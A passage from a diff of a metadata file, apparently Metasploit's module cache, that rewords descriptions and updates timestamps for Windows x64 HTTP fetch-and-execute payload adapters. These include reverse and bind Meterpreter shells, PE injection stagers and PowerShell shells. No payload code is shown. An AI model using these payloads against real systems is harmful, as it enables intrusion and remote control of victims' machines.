"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201079,7 +201440,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -201112,7 +201473,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201123,7 +201484,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -201156,7 +201517,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201167,7 +201528,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_http",
|
||||
@@ -201203,7 +201564,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201214,7 +201575,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_https",
|
||||
@@ -201247,7 +201608,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201258,7 +201619,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -201291,7 +201652,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201302,7 +201663,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp",
|
||||
@@ -201339,7 +201700,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201350,7 +201711,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -201383,7 +201744,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201394,7 +201755,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -201427,7 +201788,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201438,7 +201799,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp",
|
||||
@@ -201471,7 +201832,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201482,7 +201843,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps",
|
||||
@@ -201515,7 +201876,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201526,7 +201887,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe",
|
||||
@@ -201556,7 +201917,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201567,7 +201928,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp",
|
||||
@@ -201597,7 +201958,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201608,7 +201969,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_http",
|
||||
@@ -201638,7 +201999,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201649,7 +202010,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_https",
|
||||
@@ -201679,7 +202040,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201690,7 +202051,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp",
|
||||
@@ -201720,7 +202081,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201731,7 +202092,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp",
|
||||
@@ -201761,7 +202122,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201771,7 +202132,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -201804,7 +202165,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201814,7 +202175,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -201846,7 +202207,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201856,7 +202217,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe",
|
||||
@@ -201888,7 +202249,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201898,7 +202259,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp",
|
||||
@@ -201935,7 +202296,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201945,7 +202306,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4",
|
||||
@@ -201978,7 +202339,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201988,7 +202349,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid",
|
||||
@@ -202020,7 +202381,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202030,7 +202391,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe",
|
||||
@@ -202062,7 +202423,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202072,7 +202433,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp",
|
||||
@@ -202109,7 +202470,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202119,7 +202480,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -202152,7 +202513,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202162,7 +202523,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -202193,7 +202554,7 @@
|
||||
"Brendan Watters",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202203,7 +202564,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/pingback_reverse_tcp",
|
||||
@@ -202234,7 +202595,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -202244,7 +202605,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/powershell_bind_tcp",
|
||||
@@ -202275,7 +202636,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -202285,7 +202646,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/powershell_reverse_tcp",
|
||||
@@ -202316,7 +202677,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -202326,7 +202687,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -202355,7 +202716,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202365,7 +202726,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp",
|
||||
@@ -202397,7 +202758,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202407,7 +202768,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -202439,7 +202800,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202449,7 +202810,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
